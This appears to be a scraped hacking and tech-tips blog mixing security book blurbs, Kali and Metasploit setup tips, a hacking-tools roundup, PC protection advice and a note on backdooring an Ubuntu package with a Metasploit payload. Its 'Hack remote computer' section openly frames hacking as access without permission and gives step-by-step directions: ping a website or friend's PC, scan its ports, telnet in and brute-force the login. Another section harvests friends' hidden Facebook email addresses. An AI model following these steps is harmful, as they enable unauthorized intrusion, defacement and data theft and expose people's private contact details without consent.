Linux Malware Incident Response

Linux Malware Incident Response: A Practitioner's Guide to Forensic Collection and Examination of Volatile Data: An Excerpt from Malware Forensic Field Guide for Linux Systems

Book Details:
Pages: 134
Publisher: Syngress (March 2013)
Language: English
ISBN-10: 0124095070
ISBN-13: 978-0124095076
Format: PDF, EPUB

Book Description:
Linux Malware Incident Response is a first look at the Malware Forensics Field Guide for Linux Systems, exhibiting the first steps in investigating Linux-based incidents. The Syngress Digital Forensics Field Guides series includes companions for any digital and computer forensic investigator and analyst. Each book is a toolkit with checklists for specific tasks, case studies of difficult situations, and expert analyst tips. This compendium of tools for computer forensics analysts and investigators is presented in a succinct outline format with cross-references to supplemental appendices. It is designed to provide the digital investigator clear and concise guidance in an easily accessible format for responding to an incident or conducting analysis in a lab.

• Presented in a succinct outline format with cross-references to included supplemental components and appendices
• Covers volatile data collection methodology as well as non-volatile data collection from a live Linux system
• Addresses malware artifact discovery and extraction from a live Linux system

Table of Contents
Chapter 1. Linux Malware Incident Response

Appendix A. Linux Field Guide Tool Box
Appendix B. Selected Readings
Appendix C. Interview Questions
Appendix D. Pitfalls to Avoid
Appendix E. Live Response Field Notes

Download : Linux Malware Incident Response

Practical VoIP Security

Voice Over IP (VoIP) phone lines now represent over 50% of all new phone line installations. Every one of these new VoIP phone lines and handsets must now be protected from malicious hackers because these devices now reside on the network and are accessible from the Internet just like any server or workstation.This book will cover a wide variety of the publicly available exploit tools and how they can be used specifically against VoIP (Voice over IP) Telephony systems. The book will cover the attack methodologies that are used against the SIP and H.323 protocols as well as VoIP network infrastructure. Significant emphasis will be placed on both attack and defense techniques. This book is designed to be very hands on and scenario intensive.

Voice Over IP (VoIP) phone lines now represent over 50% of all new phone line installations. Every one of these new VoIP phone lines and handsets must now be protected from malicious hackers because these devices now reside on the network and are accessible from the Internet just like any server or workstation.

This book will cover a wide variety of the publicly available exploit tools and how they can be used specifically against VoIP (Voice over IP) Telephony systems. The book will cover the attack methodologies that are used against the SIP and H.323 protocols as well as VoIP network infrastructure. Significant emphasis will be placed on both attack and defense techniques. This book is designed to be very hands on and scenario intensive
More VoIP phone lines are being installed every day than traditional PBX phone lines· VoIP is vulnerable to the same range of attacks of any network device· VoIP phones can receive as many Spam voice mails as your e-mail can receive Spam e-mails, and as result must have the same types of anti-spam capabilities

Contents
1. Introduction
2. Architectures
3. Hardware
4. Protocols
5. Support Protocols
6. Protocol Security
7. Threats
8. Solutions Overview
9. Reuse Existing Security Infrastructure Wisely
10. Confirm User Identity
11. Active Security Monitoring
12. Logical Segregation
13. Encryption
14. A Note on Regulatory Compliance
15. Recommendations
16. Appendix

A: Access List Guidelines

Thomas Porter, Jan Kanclirz Jr., “Practical VoIP Security”
2006 | pages: 592 | ISBN: 1597490601 | PDF | 9,7 mb

Download : Practical VoIP Security

Fix msfupdate Problem

Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

The possibility of this error was their because while i was running the msfupdate command it shows me a error in some pg-0.15.1 package installation.

solution

• Go the this path (for 64 bit backtrack 5r3) - root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/

• Edit this file rbconfig.rb

• Search for this line - CONFIG["LIBRUBYARG_STATIC"] = “-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static”  and Remove this - -l$(RUBY_SO_NAME)-static

• Save 

Video :

Linux Malware Incident Response

Linux Malware Incident Response: A Practitioner's Guide to Forensic Collection and Examination of Volatile Data: An Excerpt from Malware Forensic Field Guide for Linux Systems

Book Details:

Pages: 134 
Publisher: Syngress (March 2013)
Language: English
ISBN-10: 0124095070
ISBN-13: 978-0124095076
Format: PDF, EPUB

Book Description:

Linux Malware Incident Response is a first look at the Malware Forensics Field Guide for Linux Systems, exhibiting the first steps in investigating Linux-based incidents. The Syngress Digital Forensics Field Guides series includes companions for any digital and computer forensic investigator and analyst. Each book is a toolkit with checklists for specific tasks, case studies of difficult situations, and expert analyst tips. This compendium of tools for computer forensics analysts and investigators is presented in a succinct outline format with cross-references to supplemental appendices. It is designed to provide the digital investigator clear and concise guidance in an easily accessible format for responding to an incident or conducting analysis in a lab.

Presented in a succinct outline format with cross-references to included supplemental components and appendices
Covers volatile data collection methodology as well as non-volatile data collection from a live Linux system
Addresses malware artifact discovery and extraction from a live Linux system

Table of Contents
Chapter 1. Linux Malware Incident Response

Appendix A. Linux Field Guide Tool Box
Appendix B. Selected Readings
Appendix C. Interview Questions
Appendix D. Pitfalls to Avoid
Appendix E. Live Response Field Notes

Download : Linux Malware Incident Response

MASTERING WINDOWS NETWORK FORENSICS AND INVESTIGATION, 2ND EDITION

An authoritative guide to investigating high-technology crimes Internet crime is seemingly ever on the rise, making the need for a comprehensive resource on how to investigate these crimes even more dire. This professional-level book--aimed at law enforcement personnel, prosecutors, and corporate investigators--provides you with the training you need in order to acquire the sophisticated skills and software solutions to stay one step ahead of computer criminals.

• Specifies the techniques needed to investigate, analyze, and document a criminal act on a Windows computer or network
• Places a special emphasis on how to thoroughly investigate criminal activity and now just perform the initial response
• Walks you through ways to present technically complicated material in simple terms that will hold up in court
• Features content fully updated for Windows Server 2008 R2 and Windows 7

Covers the emerging field of Windows Mobile forensics
Also included is a classroom support package to ensure academic adoption, Mastering Windows Network Forensics and Investigation, 2nd Edition offers help for investigating high-technology crimes.

About the Author
Steve Anson, CISSP, EnCE, is the cofounder of Forward Discovery. He has previously served as a police officer, FBI High Tech Crimes Task Force agent, Special Agent with the U.S. DoD, and an instructor with the U.S. State Department Antiterrorism Assistance Program (ATA). He has trained hundreds of law enforcement officers around the world in techniques of digital forensics and investigation. Steve Bunting, EnCE, CCFT, has over 35 years of experience in law enforcement, and his background in computer forensics is extensive. He has conducted computer forensic examinations for numerous local, state, and federal agencies on a variety of cases, as well as testified in court as a computer forensics expert. He has taught computer forensics courses for Guidance Software and is currently a Senior Forensic Consultant with Forward Discovery. Ryan Johnson, DFCP, CFCE, EnCE, SCERS, is a Senior Forensic Consultant with Forward Discovery. He was a digital forensics examiner for the Durham, NC, police and a Media Exploitation Analyst with the U.S. Army. He is an instructor and developer with the ATA. Scott Pearson has trained law enforcement entities, military personnel, and network/system administrators in more than 20 countries for the ATA. He is also a certifying Instructor on the Cellebrite UFED Logical and Physical Analyzer Mobile Device Forensics tool and has served as an instructor for the DoD Computer Investigations Training Academy.

Product Details
Paperback: 696 pages
Publisher: Sybex; 2 edition (June 26, 2012)
Language: English
ISBN-10: 1118163826
ISBN-13: 978-1118163825

Download Link : MASTERING WINDOWS NETWORK FORENSICS AND INVESTIGATION, 2ND EDITION

Configure xssf Metasploit Plugin in Kali Linux

The Cross-Site Scripting Framework (XSSF) is security tool designed to turn the XSS vulnerability exploitation task.XSSF allows creating a communication channel with the targeted browser (XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.XSSF provides a powerful documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easily from XSS vulnerability.

How to Configure :

1 - kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

2 - In msf3 install xssf using following command

Svn export http://xssf.googlecode.com/svn/trunk ./ --force 

3 - Load XSSF plugin using the command - load xssf

VIDEO : 

How to Hack a Computer with Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

•     Use the same sessions

•     Share hosts, captured data, and downloaded files

•     Communicate through a shared event log.

•     Run bots to automate red team tasks

VIDEO : 

How to fix Memory Card formatting problem ?

The solution of this problem is to format the Memory Card again with FATfile system through computer because your mobile cant read it any more so you cannot format it from your Mobile.

To format your Memory Card with FAT (FAT16) file system :

• Plug-in your Memory Card into your computer.

• Wait till computer detects the Memory Card.

• Now note down the Drive Letter of your Memory Card

Note: In this tutorial we will assume that drive letter of your Memory Card is I: but you should replace it with actual drive letter of your memory card.

• Now run Command Prompt by Typing CMD and hitting Enter in Start>>Run or by typing CMD and hitting Enter key after pressing WinKEY+R.Windows 7 and Vista users should type CMD in Start’s Search Box when Command Prompt appear, right click on it and run as administrator.

• Once Command Prompt launches, Type I: /fs:FAT and hit enter.

Please note that in above tutorial we assumed that I: is drive letter of memory card but this could not be same in your case so make sure to replace I: with actual drive letter of your Memory Card.
Also Please note that if you format anything your data will be erased.

How to install Tor browser in Kali Linux

Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays.

Click Here to Download Tor Browser

How to install :

VIDEO :

How to run Google Chrome as Root in Kali Linux

Steps :

• Download deb file (google chrome )

• cd Desktop

• Dpkg -i name file

• Go Launch Application

• Create New Element

• Name : Google

• Commande : Google-Chrome

• go /opt/google/chrome and open file google-chrome with leafpad
  and change ( exec -a "$0" "$HERE/chrome" "$@" --user-data-dir

VIDEO :

GUI Sqlmap in Kali Linux

Installation Commands :

• sudo apt-get install python-tk python2.7 sakura
• git clone git://github.com/sqlmapproject/sqlmap.gi­t
• cd sqlmap
• Download sqlmap from  http://gui-for-sqlmap.googlecode.com
• unzip sqm-60712.zip
• python2.7 sqm.pyw

VIDEO :

Finding out GeoLocation of IP Address using NMAP

Tries to identify the physical location of an IP address using the Geobytes geolocation web service.

Download Script

Usage

nmap --script ip-geolocation-geobytes <target>

Output

| ip-geolocation-geobytes:
|   latitude: 43.667
|   longitude: -79.417
|   city: Toronto
|   region: Ontario
|_  country: Canada

VIDEO :

SSLsplit v 0.4.5 - Man-in-the-middle attacks against SSL/TLS

A new tool presented at the Black Hat DC 2009 conference by Moxie Marlinspike proves to be a formidable foe against secure login schemes. Always trying to stay on top of the game, Click Death Squad decides to give this tool a whirl and see what the buzz is all about. This attack is particularly crafty because it acts as a Man in the Middle, keeping an eye on HTTPS requests and then mapping them to HTTP look alike setups. If a person were operating on a wireless access point that had been broken into, the results can be devastating. You have a box running sslstrip which has port forwarding enabled and is actively spoofing ARP on a LAN. This computer is the jump off point, which will fake out the wireless router into redirecting HTTPS requests, modifying them and passing them on to the victim. Features include a fake "lock" icon and selective logging capabilities, which provide great flexibility when sniffing traffic. The example we use shows how a MySpace "secure" login can be easily captured using this attack. Props to Moxie Marlinspike for making this tool available to the public.

    Add support for 2048 and 4096 bit Diffie-Hellman
    Fix syslog error messages
    Fix threading issues in daemon mode .
    Fix address family check in netfilter NAT lookup
    Fix build on recent glibc systems
    Minor code and build process improvements

Download SSLsplit v 0.4.5

VIDEO :

How to Use Whatsapp on PC for Windows and Mac

Unfortunately if you dont own a Smart phone then you might not be able to use whatsapp. But don't worry today we Will learn How to use Whatsapp On PC as well.
You can Use it On both Windows and Mac.

To Run Whatsapp on Pc, We will Require Android Emulator, Android Emulator Helps us to Run Whatsapp on PC.

Step 1: Youwave And Bluestack Are the Two Android Emulator which enable us to Run Whatsapp or any other Android App on PC.

Step 2: If you Go for Bluestack then Download and install it, then run the Bluestack and Click
on " Apps "
Then Click on the Tab " Social " and select " Whatsapp " and Install it.


Step 3: If you Go for Youwave which I am Using On My PC then just download  and install.
Now download Whatsapp.apk and move the downloaded file to PC directory.

To Check PC's Directory, Open Youwave click on help > Instruction. Now move your

whatsapp.apk file in to that directory . Then Click on View then Redraw Icons.

Now You will see Whatsapp icon .

After Installing Whatsapp on Youwave or Bluestack you have to enter Mobile number which is not used earlier For Whatsapp account.  Then they will take 5 Minutes to verify and will send you Code.
Enter that code and thats all.

How to Get Email ids of your all Facebook Friends

How to Get Email ids of your all Facebook Friends :

If you want to know email id of your facebook friends which is hidden and not showing in your friends facebook profile so here is the trick through which you can get email addresses of your all facebook friends .Just Follow Below Given Simple Steps :

Step 1 – If your facebook account is not connected with Yahoo id then first Create an email id in yahoo and connect your facebook account with yahoo Email Id .

Step 2 -Now Login to Yahoo Mail and then go to the Contacts Tab.

Step 3 – Click on Import Contatcs.

Step 4 – Now Click on Facebook .

fb trick 2012 How to Get Email ids of your all Facebook Friends Facebook Trick 2012

Step 5 - In Pop Up You will get Message that Do you want to Share your Contacts with Yahoo ! Click on OK .

facebook tricks 2012 How to Get Email ids of your all Facebook Friends Facebook Trick 2012

Step 6 – Now you will get Message

Step 7 – Thats it ! Click on View imported contacts and See you facebook friends Email Ids .

How to install OpenShot 1.4.3 in Ubuntu

Install OpenShot 1.4.3 in Ubuntu

Popular Linux video editor, OpenShot, has just been updated to version 1.4.3 and this brief tutorial is going to show you how to install or upgrade to it in Ubuntu 12.04 (Precise Pangolin).

This release brings many changes as well as new features including, a new dark theme, 3D animations and effects, and others.

For a more detailed changelog, please click here.

To get started, press Ctrl – Alt – T on your keyboard to open the terminal. When it opens, run the commands below to add its PPA.

sudo add-apt-repository ppa:openshot.developers/ppa

sudo apt-get update

sudo apt-get install openshot frei0r-plugins

VIDEO :

Add Open As Administrator to the Context Menu in Ubuntu

Add Open As Administrator to the Context Menu in Ubuntu :

When this feature is enabled, you should be able to right-click any file or folder in nautilus and open it as an administrator or root. This will come in handy especially for new users who want to edit or modify files or folders owned by the root user or administrator.

To get started, press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the commands below to download it.

• 
  

  wget http://www.liberiangeek.net/blog/tools/libnautilus-gksu.so

  
  

Next, copy the file to the folder shown below

• 
  

  sudo cp libnautilus-gksu.so /usr/lib/nautilus/extensions-3.0/

  
  

Restart your computer and enjoy!

VIDEO :

DroidSQLi : First automated MySQL Injection tool for Android

DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection

Click here to Download

Top 15 Hacking , Cracking , Pentesting Tools

Top 15 Hacking , Cracking , Pentesting Tools


1. PWN STAR

A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..



General Features:

• Managing Interfaces and MAC Spoofing


• Set sniffing


• Phishing Web


• Karmetasploit


• WPA handshake


• De-auth client


• Managing Iptables

    Download This PWN Star

2. ZED ATTACK PROXY (ZAP)

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.

Key Features:

 

• Intercepting Proxy


• Active scanners


• Passive scanners


• Brute Force scanner


• Spider


• Fuzzer


• Port Scanner


• Dynamic SSL certificates


• API


• Beanshell integration

ZAP Download Here:

3. SET (SOCIAL ENGINEERING TOOLKIT)

Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.

Key Features:

• Spear-Phishing Attack Vector


• Java Applet Attack Vector


• Metasploit Browser Exploit Method


• Credential Harvester Attack Method


• Tabnabbing Attack Method


• Man Left in the Middle Attack Method


• Web Jacking Attack Method


• Multi-Attack Web Vector


• Infectious Media Generator


• Teensy USB HID Attack Vector

Download Social Engineering Toolkit here:

4. BURP SUITE

Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.



General Function:

• Interception proxies


• Radar and spiders crawling


• Webapps scanner


• Tool assault


• Repeater and sequencer tools

Burp Suite Download Here:

5. ETTERCAP

Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.



General Function:

• To capture traffic and data


• To do logging network


• Etc.

Download Ettercap Here:

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.

General Function SIFT:

• iPhone, Blackberry, and Android Forensic Capabilities


• Registry Viewer (YARU)


• Compatibility with F-Response Tactical, Standard, and Enterprise


• PTK 2.0 (Special Release - Not Available for Download)


• Automated Generation Timeline via log2timeline


• Many Firefox Investigative Tools


• Windows Journal Parser and Shellbags Parser (jp and sbag)


• Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)


• Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

Download the SANS Investigative Forensic Toolkit (SIFT) here:

 

7. WIRESHARK

Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.



General Function:

• Live capture and offline analysis


• Standard three-pane packet browser


• Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others


• Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility


• The most powerful display filters in the industry


• Rich VoIP analysis


• Read / write many different capture file formats


• Etc.

Download Wireshark Here:

8. WEBSPLOIT

WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.



Key Features: 

[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack

Download WebSploit Framework here:

9. WINAUTOPWN

WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. Widely used by "Defacer" Indonesia to deface the Windows Server

Download WinAutoPWN Here:

10. HASHCAT

Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.

General Function:

• Multi-Threaded


• Free


• Multi-Hash (up to 24 million hashes)


• Multi-OS (Linux, Windows and OSX native binaries)


• Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)


• SSE2 accelerated


• All Attack-Modes except Brute-Force and Permutation can be extended by rules


• Very fast Rule-engine


• Rules compatible with JTR and PasswordsPro


• Possible to resume or limit session


• Automatically recognizes recovered hashes from outfile at startup


• Can automatically generate random rules


• Load saltlist from an external file and then use them in a Brute-Force Attack variant


• Able to work in an distributed environment


• Specify multiple wordlists or multiple directories of wordlists


• Number of threads can be configured


• Lowest priority threads run on


• 30 + Algorithms is implemented with performance in mind


• ... and much more

Download HashCat Here:

11. UNISCAN

Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.



General Function:

 

• Identification of system pages through a Web Crawler.


• Use of threads in the crawler.


• Control the maximum number of requests the crawler.


• Control of variation of system pages identified by Web Crawler.


• Control of file extensions that are ignored.


• Test of pages found via the GET method.


• Test the forms found via the POST method.


• Support for SSL requests ( HTTPS ).


• Proxy support.


• Generate site list using Google.


• Generate site list using Bing.


• Plug-in support for Crawler.


• Plug-in support for dynamic tests.


• Plug-in support for static tests.


• Plug-in support for stress tests.


• Multi-language support.


• Web client.

Download Uniscan Here:

12. OLYYDBG

OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.



General Function:

• Intuitive user interface, no cryptical commands


• Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings


• Directly loads and debugs DLLs


• Object file scanning - locates routines from object files and libraries


• Allows for user-defined labels, comments and function descriptions


• Understands debugging information in Borland ® format


• Saves patches between sessions, writes them back to executable file and updates fixups


• Open architecture - many third-party plugins are available


• No installation - no trash in registry or system directories


• Debugs multithreaded applications


• Attaches to running programs


• Configurable disassembler, supports both MASM and IDEAL formats


• MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions


• Full UNICODE support


• Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!


• Recognizes complex code constructs, like call to jump to procedure


• Decodes calls to more than 1900 standard API and 400 C functions


• Gives context-sensitive help on API functions from external help file


• Sets conditional, logging, memory and hardware breakpoints


• Traces program execution, logs arguments of known functions


• Shows fixups


• Dynamically traces stack frames


• Searches for imprecise commands and masked binary sequences


• Searches whole allocated memory


• Finds references to constant or address range


• Examines and modifies memory , sets breakpoints and Pauses program on-the-fly


• Assembles commands into the shortest binary form


• Starts from the floppy disk

OllyDbg Download Here:

13. BBQSQL

 

BBQSQL an Opensource SQL injection tools with the framework specifically designed to carry out the process in hyper fast, database agnostic, easy to setup, and easy to modify. This is another amazing release from Arsenal Blackhat USA 2012. When conducting security assessments of applications, we often find that it is difficult to SQL vulnerabilities exploitable, with this tool will be extremely easy.

BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.



General Function:

• SQL Injection Tools


• URL


• HTTP Method


• Headers


• Cookies


• Encoding methods


• Redirect behavior


• Files


• HTTP Auth


• Proxies

Download BBQSQL Here:

14. CRYPTOHAZE

Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.



General Function:

• Crack various kinds of hash


• Showing results from crackhash


• Cracking on various OS platforms

Download Cryptohaze Here:

15. SAMURAI WEB TESTING FRAMEWORK (SWTF)
SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. Very comprehensive and widely used in the world, including one used by staff binushacker



General Function:

• Web Scanner


• Web Mapping


• Web Exploitation

 

Download The Samurai Web Testing Framework

Hack remote computer via IP and open ports

Hack remote computer :

hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online
4. Scan for open ports
5. Check for venerable ports

6. Access through the port
7. Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com

This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and venerable ports.

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.

telnet [IP address] [Port]

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one: Brutus, THC Hydra...

- THC Hydra
In this way you’ll able to hack remove computer using only IP address

How to Protect Your Computer from Hackers , Spyware and Viruses

How to Protect Your Computer from Hackers :

When you’re online, you expose your vulnerability to malicious virus that have been growing in virulence and ferocity over the last few years. These program codes have gone beyond mere annoyances with the worst kinds disabling your PC, but they have become portals for remotely perpetuating more sinister activity that can clandestinely hack into sites, mount denial of services or steal confidential and personal data for fraudulent financial gain at your expense.

Are these virus serious enough to cause losses? Among home PC users, you may think having to reinstall your OS after a virus or malware has brought it down is not really expensive as you lose just a day or two to reinstall your programs and rebuilding files, consider that in a business, you could actually lose millions. Just ask ChoicePoint when it took a $6 million charge in 2005 after cyber criminals hacked into their systems and stole sensitive data from thousands of customers. Or the credit card processor CardSystems Solutions which may yet go out of business from major security breach at the company's Tucson, Arizona, operations center. In a recent consumer survey among security breach victims, people don't take lightly the loss of their data. More than 60% of respondents indicated their plans to terminate business relationships with a company that lost the data they entrusted to them.

In 2004, rootkits were a relatively obscure form of Trojans meant to infect Unix computers. But by 2005, rootkits have become a mainstream security threat after Sony BMG Music Entertainment shipped a few million CDs that contained a rootkit among its copy protection scheme. Within a few months, Sony recalled the CDs, but it was too late, According to security experts, rootkits attacking Windows PC were here to stay.

Most of the viruses on the computer were hidden in files that had been downloaded off the Internet: songs, videos, and movies. I was amazingly surprised that the computer lasted for 2 years with that many viruses! So I gave my dear cousin a serious lesson in how to protect her computer from the dangers of the Internet and I will go through them here for anyone else who might be interested!

1. Install Anti-Virus Software - This should not even have to be listed, if you don’t have anti-virus software installed, you’re asking for trouble! And if your reason for not installing anti-virus software is because it’s too expensive, then that can reason can be shot down because there are several free anti-virus programs out there that are considered better than commercial software packages. Here are two of the most popular ones:

AVG Anti-Virus – Very good and completely free.

Avast Anti-Virus – Almost on par with AVG.

Kaspersky Anti-Virus – Not free, but one of the best detection rates.

2. Update All Software - Installing an anti-virus program by itself is not enough. There are hundreds of new threats that are found daily and the anti-virus programs release updates regularly to combat the new threats. Make sure you anti-virus program is set to update automatically so that you don’t have to rely on your memory to do it. Also, this goes for all the software on your computer. The most important software to keep up to date is your Windows operating system. It is essential to have Automatic Updates turned on and set to download and install updates automatically.

3. Install only Trusted Software - If you’re not sure what a piece of software does from it’s name, then don’t install it. Also, don’t install anything you didn’t intend to install in the first place. Sometimes programs will ask you to install other programs during the install of the first application. Be careful of that because it’s usually spyware. Install software from big names sites only, such as Microsoft or Adobe.

4. Avoid P2P File Sharing Software – If used with great caution, P2P software is quite useful for movies, songs and software, but if you’re not very technically savvy, you might end up downloading a song that has a keystroke logger attached to it that will send anything you type to some other computer over the Internet. It’s almost impossible to tell that this is occurring unless your anti-virus or anti-spyware programs pick it up in their scans.

5. Delete Unknown Emails – If you receive emails from random people’s names, do not bother to open the email, just delete it. If you have any doubts after reading the name and the subject, it’s probably not someone you know. Never download or open attachments unless you are sure it’s from someone you know. Give the person a call quickly and ask them if you’re not sure. Most large companies that you create online accounts with will not send you attachments unless you specifically ask for them through their web site. Also, be wary of any emails from sites pretending to be banks, auction sites, etc asking for you to verify bank account info or address info. No bank ever does that.

6. Do not click on Ads - Avoid clicking on ads if you can. Especially those ads where something is flying around and if you shoot the duck, you win some prize! Ads have become more sophisticated in that they try to make the ad interactive so that you’ll be tempted to play it like a game.

7. Run Virus Scans Regularly – If you’re not in the mood to scan every day, at least run a scan once a week. Actually, setup a schedule for your computer in your anti-virus software to run a scan late at night or whenever you don’t use your computer and that way you won’t be bothered with a slow computer.

8. Be careful what you attach to your computer – This is a more common way to transfer viruses than you might think. Everyone now has a USB flash stick that they carry around on their key chains, ready to snap into any computer. But who knows what your viruses are on your friends computers and what accidentally got transferred to their USB stick. A lot of virus programs will auto launch right when the USB stick is put into the computer, so you don’t even have to open or download any of the files to be infected.

9. Avoid Shady Web Sites – If you need to look at porn, then make sure you do it in a virtual environment. You are DEFINITELY going to get some virus or spyware if you browse porn sites on your computer. Virtualization basically allows you to run programs like Internet Explorer in a virtual environment that does not effect your current operating system. If you want to find out more, search for “Virtual PC” or “VM Ware” in Google. Otherwise, simply avoid going to shady web sites!

10. Turn On or Install a Firewall - If you’re running Windows XP, make sure Windows Firewall is turned on. A firewall prevents hackers from gaining access to your computer by limiting the number of ports that are open to the public. Also, when buying a wireless router, make sure it has a built in firewall. Having a software and hardware firewall is better than just having one or the other.

11. Secure Your Wireless Network – Most wireless routers are set to no security when you install them. Be sure to log into the router and at least set the basic security that requires a password. There are stronger encryption options, but if you don’t understand those, then simply set a password on the router, otherwise anyone can connect to your home network and access everything.

12. Use a Complex Password for Login – This means that you should already have a password to login to your computer. Not having a password at all is not a good idea. Create a password for all user accounts and make sure it’s complex. Complex means it should have numbers, upper case characters, lower case characters, and symbols. This makes it way more difficult for a hacker to get into your computer.

YoNTMA - A tool to protect your encrypted data

You're a responsible defender of your data. You keep all of your disks encrypted. You hibernate your laptop when you're not using it to keep any sensitive data out of RAM. You're known by friends, family, and colleagues as a tireless crusader against data theft. But do you hibernate your laptop when you visit a co-worker's office for a few minutes? What about when you get up to use the bathroom? What happens if a thief snatches your laptop while it's locked, but still powered on? The encryption keys are still in memory, which makes them vulnerable to DMA or cold boot attacks. Once the thief has the data encryption keys, they effectively have physical access to an unencrypted laptop, which means game over for your data.

Enter YoNTMA ! YoNTMA (You'll Never Take Me Alive!) is a tool designed to enhance the protection of encrypted data. YoNTMA runs as a background service and begins monitoring your computer any time the screen is locked. If the power cable or Ethernet cable is disconnected from the system while your laptop is locked, YoNTMA will immediately hibernate the machine to ensure that the disk encryption keys do not remain in RAM. This ensures that if a thief walks off with your powered-on laptop, your encrypted data stays protected.

iSEC Partners is pleased to announce the first public release of YoNTMA. The project is hosted on GitHub at the following URL 

Try it out and let us know what features you'd like to see or any other feedback you have on the Issues page.

Binary Linux Trojan

Binary Linux Trojan

Binary Linux Trojan is  not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. An excellent video was made by Redmeat_uk demonstrating this technique that you can view at http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

